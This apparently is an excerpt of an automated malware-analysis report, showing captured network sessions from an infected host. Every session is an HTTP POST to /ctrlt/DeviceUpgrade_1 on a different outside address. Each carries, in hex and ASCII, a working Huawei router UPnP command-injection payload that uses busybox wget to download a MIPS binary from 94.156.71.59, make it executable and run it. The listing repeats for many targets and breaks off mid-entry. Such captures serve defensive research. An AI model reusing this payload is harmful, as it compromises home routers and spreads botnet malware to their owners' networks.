31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1015192.168.2.134728641.77.158.2837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.476010084 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1016192.168.2.1333630156.127.187.3137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.479439974 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1017192.168.2.135447241.134.236.17937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.482568026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1018192.168.2.1352454156.191.46.24337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.487113953 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1019192.168.2.1351570197.99.61.17437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.490221977 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1020192.168.2.135421241.22.61.25537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.492703915 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1021192.168.2.1334398197.190.110.2137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.495588064 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1022192.168.2.134892041.52.231.15137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.502618074 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1023192.168.2.134278841.245.211.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.506514072 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1024192.168.2.134908441.68.79.3737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.510191917 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1025192.168.2.133366041.222.180.14937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.513741016 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
